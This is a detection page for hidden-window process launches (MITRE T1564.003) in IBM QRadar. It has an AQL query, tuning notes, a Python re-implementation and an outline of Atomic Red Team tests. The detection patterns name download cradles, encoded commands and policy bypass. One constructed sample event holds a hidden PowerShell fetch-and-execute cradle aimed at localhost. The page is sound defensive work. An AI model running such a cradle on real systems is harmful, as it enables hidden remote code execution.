T1564.003 IBM QRadar · QRadar

Detect Hidden Window in IBM QRadar

Adversaries may use hidden windows to conceal malicious activity from users. On Windows, this is achieved through PowerShell's -WindowStyle Hidden flag or by using the ShowWindow API with SW_HIDE. The CreateProcess API's STARTUPINFO structure also allows processes to be created without a visible window. On macOS, the LSUIElement or LSBackgroundOnly Info.plist keys make applications background-only. Malware families using hidden windows include Astaroth, QuietSieve, StrongPity, and LockBit 2.0.

MITRE ATT&CK

Tactic: Defense Evasion
Technique: T1564 Hide Artifacts
Sub-technique: T1564.003 Hidden Window
Canonical reference: https://attack.mitre.org/techniques/T1564/003/

QRadar Detection Query

Ariel Query Language (AQL), IBM QRadar:
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  "Process Name" AS process_name,
  "Command" AS command_line,
  "Parent Process Name" AS parent_process,
  CASE WHEN LOWER("Command") LIKE '%-windowstyle hidden%'
            OR LOWER("Command") LIKE '%-w hidden%'
            OR LOWER("Command") LIKE '%-windowstyle h%'
            OR LOWER("Command") LIKE '%/hh%' THEN 1 ELSE 0 END AS ps_hidden,
  CASE WHEN LOWER("Command") LIKE '%-encodedcommand%'
            OR LOWER("Command") LIKE '%-enc %'
            OR LOWER("Command") LIKE '%-e %'
            OR LOWER("Command") LIKE '%-ec %' THEN 1 ELSE 0 END AS encoded_cmd,
  CASE WHEN LOWER("Command") LIKE '%net.webclient%'
            OR LOWER("Command") LIKE '%invoke-webrequest%'
            OR LOWER("Command") LIKE '%downloadstring%'
            OR LOWER("Command") LIKE '%iex%' THEN 1 ELSE 0 END AS download_cradle,
  CASE WHEN LOWER("Command") LIKE '%-executionpolicy bypass%'
            OR LOWER("Command") LIKE '%-ep bypass%' THEN 1 ELSE 0 END AS policy_bypass
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Microsoft Windows Security Event Log', 'Sysmon')
  AND QIDNAME(qid) IN ('Process Create', 'A new process has been created')
  AND ("Process Name" ILIKE '%powershell.exe' OR "Process Name" ILIKE '%pwsh.exe'
       OR "Process Name" ILIKE '%cmd.exe' OR "Process Name" ILIKE '%wscript.exe'
       OR "Process Name" ILIKE '%cscript.exe')
  AND (
    LOWER("Command") LIKE '%-windowstyle hidden%'
    OR LOWER("Command") LIKE '%-w hidden%'
    OR LOWER("Command") LIKE '%-windowstyle h%'
    OR (LOWER("Command") LIKE '%/hh%' AND "Process Name" ILIKE '%cmd.exe')
    OR (LOWER("Command") LIKE '%-noninteractive%' AND LOWER("Command") LIKE '%-windowstyle%')
  )
ORDER BY starttime DESC
LAST 86400 SECONDS

Severity: High. Confidence: High.

Detects hidden-window process creation from Windows Security Event Log and Sysmon sources. Flags PowerShell, cmd.exe, and script-host (wscript.exe, cscript.exe) processes launched with hidden-window arguments, and scores additional risk indicators (encoded commands, download cradles, execution-policy bypass) as separate columns so analysts can prioritise results. The time window is set by the trailing LAST 86400 SECONDS clause.

Data Sources

  • Microsoft Windows Security Event Log (Event ID 4688 with command-line auditing enabled)
  • Sysmon Event ID 1 via the QRadar DSM

Required Tables

events

False Positives & Tuning

  • IT automation tools such as SCCM client actions or Group Policy scripts that silently execute PowerShell with hidden windows
  • Antivirus or EDR products performing background remediation tasks using hidden PowerShell sessions
  • DevOps pipeline agents (Jenkins, GitLab Runner, Azure DevOps) running build scripts non-interactively
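The following is an added example, not part of the detection page or IBM's own tooling: an offline Python re-implementation of the AQL rule above and of the parent-process tuning described in the False Positives list. The substring predicates are the LIKE/ILIKE patterns from the query, applied to a handful of constructed process-creation events (the shape QRadar presents for Sysmon Event ID 1 and Security 4688; not real telemetry) so the base filter, the per-column scoring, and an allowlist exclusion can be checked without a QRadar instance. The SCCM parent image name CcmExec.exe and the sample paths, users, and command lines are constructed for the demonstration.

```python
"""Offline mirror of the QRadar T1564.003 hidden-window rule (added example)."""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Sequence

# Predicates copied from the AQL CASE expressions (all matched on the lowercased command line).
PS_HIDDEN = ("-windowstyle hidden", "-w hidden", "-windowstyle h", "/hh")
ENCODED_CMD = ("-encodedcommand", "-enc ", "-e ", "-ec ")
DOWNLOAD_CRADLE = ("net.webclient", "invoke-webrequest", "downloadstring", "iex")
POLICY_BYPASS = ("-executionpolicy bypass", "-ep bypass")
# Image names from the WHERE clause ("Process Name" ILIKE '%powershell.exe' OR ...).
TARGET_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


@dataclass
class Event:
    """Minimal shape of a normalised process-creation event (Sysmon EID 1 / Security 4688)."""
    process_name: str
    command: str
    parent_process: str
    username: str = ""


@dataclass
class Alert:
    """One row the query would return, with the four scoring columns."""
    event: Event
    ps_hidden: int
    encoded_cmd: int
    download_cradle: int
    policy_bypass: int

    @property
    def score(self) -> int:
        return self.ps_hidden + self.encoded_cmd + self.download_cradle + self.policy_bypass


def _any_in(haystack: str, needles: Sequence[str]) -> int:
    return int(any(n in haystack for n in needles))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_base_filter(ev: Event) -> bool:
    """Mirror of the AQL WHERE clause: interpreter image plus a hidden-window argument."""
    image = _basename(ev.process_name)
    cmd = ev.command.lower()
    if not image.endswith(TARGET_IMAGES):
        return False
    return (
        _any_in(cmd, PS_HIDDEN[:3]) == 1
        or ("/hh" in cmd and image.endswith("cmd.exe"))
        or ("-noninteractive" in cmd and "-windowstyle" in cmd)
    )


def score_event(ev: Event) -> Optional[Alert]:
    """Mirror of the SELECT CASE columns; None when the WHERE clause would drop the row."""
    if not matches_base_filter(ev):
        return None
    cmd = ev.command.lower()
    return Alert(ev, _any_in(cmd, PS_HIDDEN), _any_in(cmd, ENCODED_CMD),
                 _any_in(cmd, DOWNLOAD_CRADLE), _any_in(cmd, POLICY_BYPASS))


def run_detection(events: Iterable[Event], parent_allowlist: Sequence[str] = ()) -> List[Alert]:
    """Apply the rule, then drop rows whose parent image is on the tuning allowlist
    (the SCCM / EDR / CI-agent exclusions from the False Positives section)."""
    allow = {p.lower() for p in parent_allowlist}
    return [a for ev in events
            if (a := score_event(ev)) is not None and _basename(ev.parent_process) not in allow]


PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; the encoded payload is UTF-16LE "whoami", as in Test 2 below.
SAMPLE_EVENTS = [
    Event(PS_PATH, "powershell.exe -NoP -WindowStyle Hidden -EncodedCommand dwBoAG8AYQBtAGkA",
          r"C:\Windows\System32\cmd.exe", "alice"),
    Event(r"C:\Program Files\PowerShell\7\pwsh.exe",
          "pwsh.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
          ".DownloadString('http://127.0.0.1:8080/x')\"", r"C:\Windows\explorer.exe", "bob"),
    Event(PS_PATH, r"powershell.exe -NonInteractive -WindowStyle Hidden -File C:\Windows\CCM\SystemTemp\inv.ps1",
          r"C:\Windows\CCM\CcmExec.exe", "SYSTEM"),      # SCCM client action (tuning candidate)
    Event(r"C:\Windows\System32\notepad.exe", "notepad.exe -WindowStyle Hidden",
          r"C:\Windows\explorer.exe", "carol"),            # wrong image: never matches
    Event(PS_PATH, "powershell.exe -NoProfile -Command Get-Date",
          r"C:\Windows\explorer.exe", "dave"),             # visible window: never matches
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS, parent_allowlist=("CcmExec.exe",)):
        e = alert.event
        print(f"score={alert.score} user={e.username} parent={_basename(e.parent_process)} cmd={e.command}")
```

Running the block prints two alerts: the encoded-command launch (score 2) and the bypass-plus-cradle launch (score 3); the SCCM-parented event matches the rule but is removed by the allowlist, which is the tuning the False Positives list recommends. The `-e ` and `iex` predicates are plain substring matches, exactly as in the AQL, so the score column is a prioritisation aid rather than a precise classification.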
Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: PowerShell Hidden Window Execution

    Expected signal: Sysmon Event ID 1: powershell.exe with -WindowStyle Hidden in command line. Sysmon Event ID 11: file created at Temp path. PowerShell ScriptBlock Log Event ID 4104 with the command content.

  2. Test 2: Hidden Window with Encoded Command

    Expected signal: Sysmon Event ID 1: powershell.exe with both -WindowStyle Hidden and -EncodedCommand in command line. PowerShell ScriptBlock Log Event ID 4104 showing decoded content 'whoami'.

  3. Test 3: Hidden Window with Execution Policy Bypass and Download Cradle

    Expected signal: Sysmon Event ID 1: powershell.exe with all three flags (-WindowStyle Hidden, -ExecutionPolicy Bypass, and a download cradle). Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. The download will fail (no server is listening), but both the process creation and the network event still fire.
